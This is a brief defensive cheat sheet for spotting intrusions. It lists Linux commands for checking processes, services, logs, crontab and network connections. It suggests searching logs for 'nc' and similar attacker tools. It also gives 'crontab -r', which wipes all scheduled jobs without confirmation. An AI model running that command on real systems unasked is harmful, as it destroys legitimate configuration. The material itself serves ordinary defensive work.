Windows

Just use sysinternals 5head

• https://docs.microsoft.com/en-us/sysinternals/

Linux

View Processes

ps -aux

List running Services

systemctl list-units --type=service --state=running

Check your logs

Can be useful to check for “nc” or other attacker tools

cat /var/log/syslog | Grep <something>

Crontab

Check your crontab:

crontab -l

Clear your crontab:

crontab -r

Active TCP and UDP connections

ss -tulpn